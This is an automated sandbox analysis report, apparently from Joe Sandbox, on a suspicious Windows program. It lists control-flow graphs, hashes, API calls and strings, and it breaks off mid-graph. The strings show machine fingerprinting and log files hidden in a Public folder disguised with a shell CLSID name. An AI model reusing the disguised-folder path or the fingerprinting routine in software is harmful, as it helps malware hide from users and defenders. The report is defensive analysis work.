                  • Opcode Fuzzy Hash: 96c4144347eaacfba529ba0dd60b090915f6f582e2fbccf7b7be5ef0001ffb79
                  • Instruction Fuzzy Hash: DED15CA2E0CB5782FA709F19A8843B966A1FF44754F594132C9CE5B2F1DE2CE884CF41

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 85 7ffe0e169770-7ffe0e16978a call 7ffe0e16cf94 88 7ffe0e169ca2 85->88 89 7ffe0e169790-7ffe0e1697a5 call 7ffe0e16cf13 85->89 91 7ffe0e169cb6-7ffe0e169cbb 88->91 93 7ffe0e1697fb 89->93 94 7ffe0e1697a7-7ffe0e1697d5 89->94 95 7ffe0e16980d-7ffe0e169824 call 7ffe0e161292 91->95 96 7ffe0e169800-7ffe0e16980b FreeLibrary 93->96 101 7ffe0e1697de-7ffe0e1697f9 call 7ffe0e161292 94->101 102 7ffe0e1697d7-7ffe0e1697dc 94->102 100 7ffe0e169829-7ffe0e169836 95->100 96->95 99 7ffe0e169837-7ffe0e169870 GetNativeSystemInfo GetWindowsDirectoryA 96->99 103 7ffe0e16994e-7ffe0e169971 call 7ffe0e161292 99->103 104 7ffe0e169876-7ffe0e169897 GetLastError call 7ffe0e161292 99->104 101->96 102->96 103->95 113 7ffe0e169977-7ffe0e1699ad call 7ffe0e16b0e2 103->113 111 7ffe0e169899 104->111 112 7ffe0e1698b7-7ffe0e1698bd 104->112 114 7ffe0e1698ad-7ffe0e1698b2 111->114 115 7ffe0e16989b-7ffe0e1698a8 111->115 112->91 117 7ffe0e1698c3-7ffe0e1698c9 112->117 121 7ffe0e1699b3-7ffe0e1699b5 113->121 122 7ffe0e169a5e-7ffe0e169a7a call 7ffe0e161292 113->122 114->95 115->114 119 7ffe0e169902-7ffe0e169908 117->119 120 7ffe0e1698cb-7ffe0e1698ce 117->120 125 7ffe0e169cde-7ffe0e169ce3 119->125 126 7ffe0e16990e-7ffe0e169914 119->126 123 7ffe0e1698d0-7ffe0e1698d3 120->123 124 7ffe0e1698ec-7ffe0e1698f2 120->124 121->95 127 7ffe0e1699bb-7ffe0e169a18 GetVolumeInformationA 121->127 135 7ffe0e169a7f 122->135 128 7ffe0e169cc0-7ffe0e169cc5 123->128 129 7ffe0e1698d9-7ffe0e1698dc 123->129 130 7ffe0e169cd4-7ffe0e169cd9 124->130 131 7ffe0e1698f8-7ffe0e1698fd 124->131 125->95 132 7ffe0e16991a-7ffe0e169920 126->132 133 7ffe0e169ce8-7ffe0e169ced 126->133 136 7ffe0e169a1e-7ffe0e169a44 GetLastError call 7ffe0e161292 127->136 137 7ffe0e169b1b-7ffe0e169b4d call 7ffe0e161292 127->137 128->95 138 7ffe0e1698e2-7ffe0e1698e7 129->138 139 7ffe0e169cca-7ffe0e169ccf 129->139 130->95 131->95 140 7ffe0e169cf2-7ffe0e169cf7 132->140 141 7ffe0e169926-7ffe0e16992b 132->141 133->95 135->121 148 7ffe0e169a84-7ffe0e169a8a 136->148 149 7ffe0e169a46 136->149 146 7ffe0e169b61-7ffe0e169b68 137->146 147 7ffe0e169b4f-7ffe0e169b5b strlen 137->147 138->95 139->95 140->95 141->95 153 7ffe0e169b6c-7ffe0e169bc9 call 7ffe0e161292 146->153 147->146 150 7ffe0e169c23-7ffe0e169c27 147->150 151 7ffe0e169a90 148->151 152 7ffe0e169be7-7ffe0e169bec 148->152 154 7ffe0e169bd3-7ffe0e169bd8 149->154 155 7ffe0e169a4c-7ffe0e169a59 149->155 150->146 159 7ffe0e169c2d-7ffe0e169c31 150->159 156 7ffe0e169a92-7ffe0e169a95 151->156 157 7ffe0e169ac9-7ffe0e169acf 151->157 152->95 162 7ffe0e169bce 153->162 154->95 155->122 160 7ffe0e169ab3-7ffe0e169ab9 156->160 161 7ffe0e169a97-7ffe0e169a9a 156->161 163 7ffe0e169ad5-7ffe0e169adb 157->163 164 7ffe0e169c0f-7ffe0e169c14 157->164 159->146 165 7ffe0e169c37-7ffe0e169c6a _errno call 7ffe0e172ab8 _errno 159->165 169 7ffe0e169c05-7ffe0e169c0a 160->169 170 7ffe0e169abf-7ffe0e169ac4 160->170 167 7ffe0e169aa0-7ffe0e169aa3 161->167 168 7ffe0e169bf1-7ffe0e169bf6 161->168 162->100 171 7ffe0e169ae1-7ffe0e169ae7 163->171 172 7ffe0e169c19-7ffe0e169c1e 163->172 164->95 178 7ffe0e169c6c-7ffe0e169c6f 165->178 179 7ffe0e169c7a-7ffe0e169c9d _errno call 7ffe0e161292 165->179 174 7ffe0e169bfb-7ffe0e169c00 167->174 175 7ffe0e169aa9-7ffe0e169aae 167->175 168->95 169->95 170->95 176 7ffe0e169af3-7ffe0e169af8 171->176 177 7ffe0e169ae9-7ffe0e169aee 171->177 172->95 174->95 175->95 176->95 177->95 178->153 180 7ffe0e169c75 178->180 179->146 180->146
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                  • API String ID: 3828489143-883582248
                  • Opcode ID: 3028c8487b4850c2a8afba3d3fc94739010c0dc3b44ea0e207f98bdf53cb8255
                  • Instruction ID: 7c282bbee82bafe90567b4e7a44e0ebd147d0590c6287177b8491d22871f12c1
                  • Opcode Fuzzy Hash: 3028c8487b4850c2a8afba3d3fc94739010c0dc3b44ea0e207f98bdf53cb8255
                  • Instruction Fuzzy Hash: 06D15762E0C65B82FB208B14E4803B963A4AF85B95F654033D9CE576F6DE3DE885C781

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 379 7ffe11ec4430-7ffe11ec444a call 7ffe11ec2174 382 7ffe11ec4450-7ffe11ec4465 call 7ffe11ec20f3 379->382 383 7ffe11ec4962 379->383 388 7ffe11ec4467-7ffe11ec4495 382->388 389 7ffe11ec44bb 382->389 385 7ffe11ec4976-7ffe11ec497b 383->385 387 7ffe11ec44cd-7ffe11ec44e4 call 7ffe11ec2fd2 385->387 393 7ffe11ec44e9-7ffe11ec44f6 387->393 397 7ffe11ec4497-7ffe11ec449c 388->397 398 7ffe11ec449e-7ffe11ec44b9 call 7ffe11ec2fd2 388->398 390 7ffe11ec44c0-7ffe11ec44cb FreeLibrary 389->390 390->387 392 7ffe11ec44f7-7ffe11ec4530 GetNativeSystemInfo GetWindowsDirectoryA 390->392 395 7ffe11ec4536-7ffe11ec4557 GetLastError call 7ffe11ec2fd2 392->395 396 7ffe11ec460e-7ffe11ec4631 call 7ffe11ec2fd2 392->396 405 7ffe11ec4559 395->405 406 7ffe11ec4577-7ffe11ec457d 395->406 396->387 407 7ffe11ec4637-7ffe11ec466d call 7ffe11ec9702 396->407 397->390 398->390 408 7ffe11ec456d-7ffe11ec4572 405->408 409 7ffe11ec455b-7ffe11ec4568 405->409 406->385 411 7ffe11ec4583-7ffe11ec4589 406->411 415 7ffe11ec471e-7ffe11ec473a call 7ffe11ec2fd2 407->415 416 7ffe11ec4673-7ffe11ec4675 407->416 408->387 409->408 412 7ffe11ec458b-7ffe11ec458e 411->412 413 7ffe11ec45c2-7ffe11ec45c8 411->413 417 7ffe11ec45ac-7ffe11ec45b2 412->417 418 7ffe11ec4590-7ffe11ec4593 412->418 419 7ffe11ec499e-7ffe11ec49a3 413->419 420 7ffe11ec45ce-7ffe11ec45d4 413->420 435 7ffe11ec473f 415->435 416->387 421 7ffe11ec467b-7ffe11ec46d8 GetVolumeInformationA 416->421 424 7ffe11ec45b8-7ffe11ec45bd 417->424 425 7ffe11ec4994-7ffe11ec4999 417->425 422 7ffe11ec4599-7ffe11ec459c 418->422 423 7ffe11ec4980-7ffe11ec4985 418->423 419->387 426 7ffe11ec49a8-7ffe11ec49ad 420->426 427 7ffe11ec45da-7ffe11ec45e0 420->427 429 7ffe11ec47db-7ffe11ec480d call 7ffe11ec2fd2 421->429 430 7ffe11ec46de-7ffe11ec4704 GetLastError call 7ffe11ec2fd2 421->430 431 7ffe11ec498a-7ffe11ec498f 422->431 432 7ffe11ec45a2-7ffe11ec45a7 422->432 423->387 424->387 425->387 426->387 433 7ffe11ec45e6-7ffe11ec45eb 427->433 434 7ffe11ec49b2-7ffe11ec49b7 427->434 442 7ffe11ec4821-7ffe11ec4828 429->442 443 7ffe11ec480f-7ffe11ec481b strlen 429->443 440 7ffe11ec4706 430->440 441 7ffe11ec4744-7ffe11ec474a 430->441 431->387 432->387 433->387 434->387 435->416 444 7ffe11ec470c-7ffe11ec4719 440->444 445 7ffe11ec4893-7ffe11ec4898 440->445 446 7ffe11ec48a7-7ffe11ec48ac 441->446 447 7ffe11ec4750 441->447 449 7ffe11ec482c-7ffe11ec4889 call 7ffe11ec2fd2 442->449 443->442 448 7ffe11ec48e3-7ffe11ec48e7 443->448 444->415 445->387 446->387 451 7ffe11ec4789-7ffe11ec478f 447->451 452 7ffe11ec4752-7ffe11ec4755 447->452 448->442 450 7ffe11ec48ed-7ffe11ec48f1 448->450 459 7ffe11ec488e 449->459 450->442 456 7ffe11ec48f7-7ffe11ec492a _errno call 7ffe11ed0c38 _errno 450->456 454 7ffe11ec48cf-7ffe11ec48d4 451->454 455 7ffe11ec4795-7ffe11ec479b 451->455 457 7ffe11ec4757-7ffe11ec475a 452->457 458 7ffe11ec4773-7ffe11ec4779 452->458 454->387 462 7ffe11ec48d9-7ffe11ec48de 455->462 463 7ffe11ec47a1-7ffe11ec47a7 455->463 472 7ffe11ec492c-7ffe11ec492f 456->472 473 7ffe11ec493a-7ffe11ec495d _errno call 7ffe11ec2fd2 456->473 465 7ffe11ec48b1-7ffe11ec48b6 457->465 466 7ffe11ec4760-7ffe11ec4763 457->466 460 7ffe11ec477f-7ffe11ec4784 458->460 461 7ffe11ec48c5-7ffe11ec48ca 458->461 459->393 460->387 461->387 462->387 469 7ffe11ec47a9-7ffe11ec47ae 463->469 470 7ffe11ec47b3-7ffe11ec47b8 463->470 465->387 467 7ffe11ec4769-7ffe11ec476e 466->467 468 7ffe11ec48bb-7ffe11ec48c0 466->468 467->387 468->387 469->387 470->387 472->449 474 7ffe11ec4935 472->474 473->442 474->442
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                  • API String ID: 3828489143-883582248
                  • Opcode ID: faec4ae17eb185d37a33eb22cefa78a388db1887f3bae8ef54cde5a0b0eff3d3
                  • Instruction ID: 711b621461edba18d691f1edf1293e316689594ab93c440d323f294f5edde61a
                  • Opcode Fuzzy Hash: faec4ae17eb185d37a33eb22cefa78a388db1887f3bae8ef54cde5a0b0eff3d3
                  • Instruction Fuzzy Hash: 0BD185A2D0CE6781FF209BD6EC403BB6298AF41774F9911B6D94D176B4DE2DF8848381

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 615 7ff76a9093f0-7ff76a90940a call 7ff76a901694 618 7ff76a909410-7ff76a909425 call 7ff76a901613 615->618 619 7ff76a909922 615->619 623 7ff76a909427-7ff76a909455 618->623 624 7ff76a90947b 618->624 622 7ff76a909936-7ff76a90993b 619->622 625 7ff76a90948d-7ff76a9094a4 call 7ff76a9099e2 622->625 631 7ff76a909457-7ff76a90945c 623->631 632 7ff76a90945e-7ff76a909479 call 7ff76a9099e2 623->632 626 7ff76a909480-7ff76a90948b FreeLibrary 624->626 630 7ff76a9094a9-7ff76a9094b6 625->630 626->625 629 7ff76a9094b7-7ff76a9094f0 GetNativeSystemInfo GetWindowsDirectoryA 626->629 633 7ff76a9095ce-7ff76a9095f1 call 7ff76a9099e2 629->633 634 7ff76a9094f6-7ff76a909517 GetLastError call 7ff76a9099e2 629->634 631->626 632->626 633->625 643 7ff76a9095f7-7ff76a90962d call 7ff76a905602 633->643 641 7ff76a909537-7ff76a90953d 634->641 642 7ff76a909519 634->642 641->622 647 7ff76a909543-7ff76a909549 641->647 644 7ff76a90951b-7ff76a909528 642->644 645 7ff76a90952d-7ff76a909532 642->645 651 7ff76a9096de-7ff76a9096fa call 7ff76a9099e2 643->651 652 7ff76a909633-7ff76a909635 643->652 644->645 645->625 649 7ff76a90954b-7ff76a90954e 647->649 650 7ff76a909582-7ff76a909588 647->650 653 7ff76a90956c-7ff76a909572 649->653 654 7ff76a909550-7ff76a909553 649->654 655 7ff76a90995e-7ff76a909963 650->655 656 7ff76a90958e-7ff76a909594 650->656 667 7ff76a9096ff 651->667 652->625 660 7ff76a90963b-7ff76a909698 GetVolumeInformationA 652->660 663 7ff76a909578-7ff76a90957d 653->663 664 7ff76a909954-7ff76a909959 653->664 661 7ff76a909559-7ff76a90955c 654->661 662 7ff76a909940-7ff76a909945 654->662 655->625 657 7ff76a909968-7ff76a90996d 656->657 658 7ff76a90959a-7ff76a9095a0 656->658 657->625 665 7ff76a909972-7ff76a909977 658->665 666 7ff76a9095a6-7ff76a9095ab 658->666 668 7ff76a90979b-7ff76a9097cd call 7ff76a9099e2 660->668 669 7ff76a90969e-7ff76a9096c4 GetLastError call 7ff76a9099e2 660->669 670 7ff76a90994a-7ff76a90994f 661->670 671 7ff76a909562-7ff76a909567 661->671 662->625 663->625 664->625 665->625 666->625 667->652 676 7ff76a9097cf-7ff76a9097db strlen 668->676 677 7ff76a9097e1-7ff76a9097e8 668->677 678 7ff76a909704-7ff76a90970a 669->678 679 7ff76a9096c6 669->679 670->625 671->625 676->677 680 7ff76a9098a3-7ff76a9098a7 676->680 683 7ff76a9097ec-7ff76a909849 call 7ff76a9099e2 677->683 681 7ff76a909867-7ff76a90986c 678->681 682 7ff76a909710 678->682 684 7ff76a9096cc-7ff76a9096d9 679->684 685 7ff76a909853-7ff76a909858 679->685 680->677 686 7ff76a9098ad-7ff76a9098b1 680->686 681->625 687 7ff76a909749-7ff76a90974f 682->687 688 7ff76a909712-7ff76a909715 682->688 693 7ff76a90984e 683->693 684->651 685->625 686->677 690 7ff76a9098b7-7ff76a9098ea _errno call 7ff76a90e4f0 _errno 686->690 694 7ff76a90988f-7ff76a909894 687->694 695 7ff76a909755-7ff76a90975b 687->695 691 7ff76a909717-7ff76a90971a 688->691 692 7ff76a909733-7ff76a909739 688->692 708 7ff76a9098fa-7ff76a90991d _errno call 7ff76a9099e2 690->708 709 7ff76a9098ec-7ff76a9098ef 690->709 697 7ff76a909720-7ff76a909723 691->697 698 7ff76a909871-7ff76a909876 691->698 699 7ff76a90973f-7ff76a909744 692->699 700 7ff76a909885-7ff76a90988a 692->700 693->630 694->625 701 7ff76a909899-7ff76a90989e 695->701 702 7ff76a909761-7ff76a909767 695->702 704 7ff76a909729-7ff76a90972e 697->704 705 7ff76a90987b-7ff76a909880 697->705 698->625 699->625 700->625 701->625 706 7ff76a909769-7ff76a90976e 702->706 707 7ff76a909773-7ff76a909778 702->707 704->625 705->625 706->625 707->625 708->677 709->683 710 7ff76a9098f5 709->710 710->677
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                  • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
                  • API String ID: 3828489143-3798070276
                  • Opcode ID: 0d1d712fc87a8e209d2f08d55f3639612ebd728000b1008315dc9a74c2b6575a
                  • Instruction ID: 4bbffb433744940b4c64e71d034a426f1b6e30bab4b999d2d68288bd8bd57ac6
                  • Opcode Fuzzy Hash: 0d1d712fc87a8e209d2f08d55f3639612ebd728000b1008315dc9a74c2b6575a
                  • Instruction Fuzzy Hash: 6FD15C62E0C756C5FB61AB14E4403BAE6A0AF407D4FF540BAC95ED76E0DE2DEC4483A1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 811 7ffe1150143c-7ffe11501464 InitializeCriticalSectionAndSpinCount 812 7ffe1150146a-7ffe1150149e call 7ffe11509cc0 call 7ffe11506dd1 811->812 813 7ffe11501590-7ffe115015b1 GetLastError call 7ffe11501292 811->813 826 7ffe11501569-7ffe11501581 call 7ffe11501292 812->826 827 7ffe115014a4-7ffe115014bb strlen 812->827 818 7ffe115015b3 813->818 819 7ffe115015d2-7ffe115015d8 813->819 822 7ffe115015b9-7ffe115015c6 818->822 823 7ffe11501691-7ffe11501696 818->823 824 7ffe1150169b 819->824 825 7ffe115015de-7ffe115015e4 819->825 822->819 823->826 834 7ffe115016a5-7ffe115016aa 824->834 828 7ffe115015e6-7ffe115015ec 825->828 829 7ffe11501610-7ffe11501613 825->829 845 7ffe11501586-7ffe1150158f 826->845 830 7ffe115014bd-7ffe115014c0 827->830 831 7ffe115014d3-7ffe115014d6 827->831 832 7ffe115016b9-7ffe115016be 828->832 833 7ffe115015f2-7ffe115015f8 828->833 835 7ffe1150162d-7ffe11501633 829->835 836 7ffe11501615-7ffe11501618 829->836 830->831 838 7ffe115014c2-7ffe115014cf strlen 830->838 839 7ffe115014f8-7ffe11501541 strlen fopen 831->839 840 7ffe115014d8-7ffe115014f2 strcat strlen 831->840 832->826 841 7ffe115016c3-7ffe115016c8 833->841 842 7ffe115015fe-7ffe11501604 833->842 834->826 846 7ffe11501635-7ffe1150163a 835->846 847 7ffe115016af 835->847 843 7ffe1150161a-7ffe1150161d 836->843 844 7ffe11501687 836->844 838->831 848 7ffe1150165d-7ffe11501678 call 7ffe11501292 839->848 849 7ffe11501547-7ffe11501563 call 7ffe11501292 839->849 840->839 841->826 850 7ffe11501606-7ffe1150160b 842->850 851 7ffe1150163f-7ffe11501644 842->851 843->834 852 7ffe11501623-7ffe11501628 843->852 844->823 846->826 847->832 848->826 849->826 857 7ffe115016cd-7ffe115016e7 call 7ffe11501292 849->857 850->826 851->826 852->826 857->845
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
                  • API String ID: 3395718042-2735303109
                  • Opcode ID: 3c02316d220b7b555ab5fdc4a3a6744009a41e76f521ed24bef067a88f3ae652
                  • Instruction ID: 15767c086e6246e5b5c29bebd3ef80bcaafc913ee0b80f079535ae80b281568d
                  • Opcode Fuzzy Hash: 3c02316d220b7b555ab5fdc4a3a6744009a41e76f521ed24bef067a88f3ae652
                  • Instruction Fuzzy Hash: F7513050E0CE0386FB619797A8D03BD329EAF057B4F5440FAD50E0B6B2DE6EE9458742

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 762 7ffe0eb4143c-7ffe0eb41464 InitializeCriticalSectionAndSpinCount 763 7ffe0eb41590-7ffe0eb415b1 GetLastError call 7ffe0eb41292 762->763 764 7ffe0eb4146a-7ffe0eb4149e call 7ffe0eb41770 call 7ffe0eb4e0f1 762->764 769 7ffe0eb415b3 763->769 770 7ffe0eb415d2-7ffe0eb415d8 763->770 777 7ffe0eb414a4-7ffe0eb414bb strlen 764->777 778 7ffe0eb41569-7ffe0eb41581 call 7ffe0eb41292 764->778 772 7ffe0eb41691-7ffe0eb41696 769->772 773 7ffe0eb415b9-7ffe0eb415c6 769->773 775 7ffe0eb415de-7ffe0eb415e4 770->775 776 7ffe0eb4169b 770->776 772->778 773->770 779 7ffe0eb41610-7ffe0eb41613 775->779 780 7ffe0eb415e6-7ffe0eb415ec 775->780 787 7ffe0eb416a5-7ffe0eb416aa 776->787 783 7ffe0eb414d3-7ffe0eb414d6 777->783 784 7ffe0eb414bd-7ffe0eb414c0 777->784 789 7ffe0eb41586-7ffe0eb4158f 778->789 781 7ffe0eb41615-7ffe0eb41618 779->781 782 7ffe0eb4162d-7ffe0eb41633 779->782 785 7ffe0eb415f2-7ffe0eb415f8 780->785 786 7ffe0eb416b9-7ffe0eb416be 780->786 790 7ffe0eb41687 781->790 791 7ffe0eb4161a-7ffe0eb4161d 781->791 792 7ffe0eb416af 782->792 793 7ffe0eb41635-7ffe0eb4163a 782->793 797 7ffe0eb414f8-7ffe0eb41541 strlen fopen 783->797 798 7ffe0eb414d8-7ffe0eb414f2 strcat strlen 783->798 784->783 794 7ffe0eb414c2-7ffe0eb414cf strlen 784->794 795 7ffe0eb415fe-7ffe0eb41604 785->795 796 7ffe0eb416c3-7ffe0eb416c8 785->796 786->778 787->778 790->772 791->787 801 7ffe0eb41623-7ffe0eb41628 791->801 792->786 793->778 794->783 802 7ffe0eb4163f-7ffe0eb41644 795->802 803 7ffe0eb41606-7ffe0eb4160b 795->803 796->778 799 7ffe0eb41547-7ffe0eb41563 call 7ffe0eb41292 797->799 800 7ffe0eb4165d-7ffe0eb41678 call 7ffe0eb41292 797->800 798->797 799->778 808 7ffe0eb416cd-7ffe0eb416e7 call 7ffe0eb41292 799->808 800->778 801->778 802->778 803->778 808->789
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
                  • API String ID: 3395718042-1794035234
                  • Opcode ID: c0500373ee09827ee142d1d9492b311746de8089aa615731dc60aa0a94030b99
                  • Instruction ID: c656c0e953c543a6370e1b9f50561b62b8de1dd027137567ebb6e88f530c3396
                  • Opcode Fuzzy Hash: c0500373ee09827ee142d1d9492b311746de8089aa615731dc60aa0a94030b99
                  • Instruction Fuzzy Hash: AC517C91E1D70782FA30AF59A8803B92365EF04784F984032D9CE4A2B6DE6CF9C58F41

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 713 7ffe0e16143c-7ffe0e161464 InitializeCriticalSectionAndSpinCount 714 7ffe0e161590-7ffe0e1615b1 GetLastError call 7ffe0e161292 713->714 715 7ffe0e16146a-7ffe0e16149e call 7ffe0e16cc60 call 7ffe0e168ff1 713->715 720 7ffe0e1615b3 714->720 721 7ffe0e1615d2-7ffe0e1615d8 714->721 730 7ffe0e161569-7ffe0e161581 call 7ffe0e161292 715->730 731 7ffe0e1614a4-7ffe0e1614bb strlen 715->731 723 7ffe0e161691-7ffe0e161696 720->723 724 7ffe0e1615b9-7ffe0e1615c6 720->724 726 7ffe0e1615de-7ffe0e1615e4 721->726 727 7ffe0e16169b 721->727 723->730 724->721 728 7ffe0e161610-7ffe0e161613 726->728 729 7ffe0e1615e6-7ffe0e1615ec 726->729 737 7ffe0e1616a5-7ffe0e1616aa 727->737 738 7ffe0e161615-7ffe0e161618 728->738 739 7ffe0e16162d-7ffe0e161633 728->739 734 7ffe0e1615f2-7ffe0e1615f8 729->734 735 7ffe0e1616b9-7ffe0e1616be 729->735 745 7ffe0e161586-7ffe0e16158f 730->745 732 7ffe0e1614d3-7ffe0e1614d6 